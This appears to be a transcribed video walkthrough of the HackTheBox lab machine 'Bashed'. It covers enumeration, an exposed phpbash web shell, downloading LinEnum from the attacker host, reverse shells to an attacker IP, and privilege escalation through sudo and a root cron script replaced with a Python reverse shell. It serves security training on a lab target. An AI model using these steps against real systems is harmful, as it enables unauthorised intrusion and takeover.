What's going on YouTube? This is Ipsec and we're doing the machine bashed from HackTheBox, which is a relatively easy machine, and thank God it is because I'm just getting over the flu and don't want to do too much talking. So, because it is easy, we're going to do something a little bit different, and I'm going to show you how I take notes in an application called Cherry Tree. So, let's jump into that. Before we get into the machine, I wanted to show how I recommend taking notes as you do these boot to root type machines. The first thing is a plugin called tmux-logging. I talk about it in my tmux video, but essentially, if we just put something on the screen and then do the prefix Alt-Shift-P, we can save a whole tmux history into a file. So if we go root, tmux history, and I gotta get the right one, I guess. There we go. And we can see the text pane is there. It's not that much because we just began. So at the end of the video, I'll do another one. You can see it captures absolutely everything. The second thing I do, because that can be a bit unwieldy to have all command line output, and you have to grep through to find things, is I use a program called Cherry Tree. And I really only use it to stay organized. So we have these two things, add a node and add a child node. If you go to tree, you can see the hotkeys for it. So Control N and Control Shift N. So I'm going to do Control N, create bashed, and then Control Shift N and create subtrees. So one will be nmap because that's where we begin. And up here on this parent node, this is where I normally put information I gather. And then down here is all the like screenshots and things like that. Another handy thing is if you do Control Shift print screen, and then you can just highlight something, then you can go to Cherry Tree, Control V to paste. And it just does screenshots that way. I like this over KeepNote just because it has syntax highlighting and a bit better formatting options. So now that we did that, let us nmap the box. So nmap-sc for default scripts, sv for enumerate version, oa I'll put all formats, put in the directory nmap, let's call it initial, and then the IP address of bash, which is 10.10.10.68. I've already ran that because it does take time, so let's just look at the results. And we see port 80 is open, and it's running Apache 2418 Ubuntu. So since we have that nmap thing, let's just copy this into Cherry Tree. And we also want to see what version of Ubuntu this is based upon the Apache version. So if we go to Google, we can Google Ubuntu HTTPD versions, go to packages.ubuntu.com/apache2, and we can see Xennial 1604 is generally going to be using 2418. So go back to Cherry Tree, go to the top, and we can say Ubuntu Xennial 1604 based upon HTTP version. So let's go and actually just hit this web address and see if we see anything. And we get a page, Arexel's development phpbash. And phpbash is a link to GitHub. And it's a program that helps a lot with pen testing. I have tested on multiple different servers and it was very useful. I actually developed it on this exact server. And showing a little screenshot of what it is, so it looks like it's a nice little web shell. Click here to get the second screenshot, and yes, we can see it is a web shell. So let's just copy this code into Cherry Tree because we don't know if it'll be useful or not, so Control Shift N. I'm going to do automatic syntax highlighting, PHP, and then just paste it. So we also have to now run a Gobuster on the site to see if there's anything hidden. So opt Gobuster -u 10.10.10.68 -w for word list, user share, word list, dirbuster, directory list, 2.3 medium. And we're getting hits back right away. We have /uploads, PHP, CSS, dev, JS. So let's just check these out. So let's go to /uploads and see what is there. Go to uploads, there's nothing there. We can check out PHP. We have sendmail, so I can take a screenshot of this. Go to cherry tree. And we'll say this node will be sendmail exposed. Then next one down, let's go to dev. We go to /dev. We have phpbash and phpbash.min. So take another screenshot. Click phpbash. And we can go back to cherry tree. Create web shell exposed. Dev. And we probably want to run like ID, hostname, ifconfig. Just for proof, it is on the server and not us. I messed that highlight up. Copy that. There we go. So now what do we want to do with this shell? The first thing is probably do a Linux priv checker. So let's go back to my host. We can kill this Gobuster because we already found what we wanted, and can copy op Linux priv esc linenum.sh. Hosted on Python simple HTTP server, and we can try to curl to execute. 10.10.14.30 I think I am. linenum.sh. Pipe to bash. Nothing happened. I don't think we have curl. We do have wget, so we can wget 10.10.14.30 linenum.sh. Can't write, so let's go to dev shm. And this web shell actually has the up thing for history, which becomes very handy. But tab does not work for tab autocompletion. That is annoying. Trying to run it, it doesn't look like it runs. Oh, there we go. Just took a while to get the output. So we can go to the top. Copy all this. And go back to cherry tree. linenum as www data. And the font's bigger on this, so I'll use this to view the output. So we have the start of the scan, kernel. It's relatively up to date based upon when this machine came out, so we're not going to look for kernel privesc. 1604 Xennial, bash, www data. Rex was a user on this box. We got script manager and another user. We can sudo without supplying a password, and we may run the following commands on bash as script manager. We can run anything as script manager. So we don't have to look at this output anymore, because if we do like sudo -u script manager, who am I, we can execute commands. The unfortunate thing with this shell, though, is it's not persistent. So if I do sudo -u script manager bash, I'm still www data. If I do python c import pty.spawn bin bash, then that sudo, still www data, because it's just sending commands one at a time and every time spawning a whole new shell. So it's not persistent. In order to get the persistent shell, we have to do a reverse shell. So let's go to Pentest Monkey and look at reverse shell cheat sheet and try a few of these out. So the first thing is set up a listener on my host machine. We use port 8081. Copy this. Paste this in. 10.10.14.30 is our IP. Send that. We don't get a callback, so let's try the netcat one, which is a bit more reliable. Paste this. 8081. No reverse shell. Let's just try this PHP. Back, still nothing. So I'm going to look at the code actually. If we go to phpbash and see if there's anything that this shell is doing that may break reverse shells. And here's where we're sending the command, and it's appending a redirect. So maybe this is actually killing a reverse shell. So let's just try uploading a reverse shell and then executing it. So from the Gobuster, there was a /uploads directory. So if we go to var www html, go to uploads, there's nothing here. I can't hit tab. If we touch test, we can go back here, upload/test. We can see we created that file, because if that file didn't exist, we'd get a 404 error. So what I'm going to do is I'm going to copy a PHP reverse shell. And I believe this is on Ucali by default. If we just do locate this. Yeah, user share random. This is the one I'm using. So I just copied it in this op directory because that's what I'm used to using it. Edit this. Let's check the IP. 10.10.14.30, port 8081. So we can do python-m simple http server 80. It's already in use. Oh, I am already set that up because we have linenum going. So if we go back here and do wget 10.10.14.30/php, just copy this. Shell. We downloaded it. We can navigate to it. And we get a shell back. So if we do an ID, we have www data. We can do python-c, import pty, pty.spawn, then bash, then sty raw minus echo, foreground. And we can now do the sudo-u script manager bash. And since we're in the reverse shell, we're now persistent, so we switch to that user. And then if we do just an ls, we see a odd directory, scripts. If we ls-la, we can see script manager is the owner of that, so chances are we want to go into this directory. So let's look at it. And we have test.py and test.txt. We have test.py written December 4th. Test.txt is modified April 27th, which is today's date. And we look at the date. It looks like it's being modified every minute. as it was 1915 and 1916. So if we look at test.py, uh, I don't know why I can't get to that top line. But we do see f equals open test.txt w, then writing testing123, and then close. So if we look at that file, we see testing123. And the reason you don't see it appending is because it's in write. If this was a instead of W for append, then you'd have testing123 on multiple lines. So we're pretty certain that this test.py is what's getting executed. So if we go back to reverse shell cheat sheet, we can grab this Python, paste, and then let's replace the semicolon with \r/n for new line. That doesn't look right. Just \n? Nope. Let's just do it, man. You know what? Let's see. Go term screen. Let's export that and see if that fixes our VI issues. Okay. Okay, now we can actually move a cursor left and right. So let's just get rid of these semicolons and make them new lines. Okay. Change this to 10, 10, 14, 30, and we can leave on a port 1, 2, 3, 4. Save the file. Netcat lvnp 1, 2, 3, 4. Do a date. And we should get it executing very shortly. We do ls-la while that's going. Do print screen. Copy this. And just make a note of it. And it looks like that script may have failed. Let's see, when was the last time I ran date? 1919, 1920. So if we just Python test.py, invalid syntax because we have blank line. So it said line 8. There is no line 8. But I don't have n parenthesis on that. So if we now execute that, we get a reverse shell, so we know the syntax is good. So on the upcoming minute, we should get a callback, and we are root. And the reason why we knew we would get root is because root owns this test.txt file. So if we do cron tab-L, we can see it executing, so we can print the screen, take the screenshot, go to cherry tree, and paste that. So if we go to /root, we can do wc-c root.txt, and we see that is indeed 32 characters for MD5 sum. So that is the box. Hope you guys enjoyed, and take care.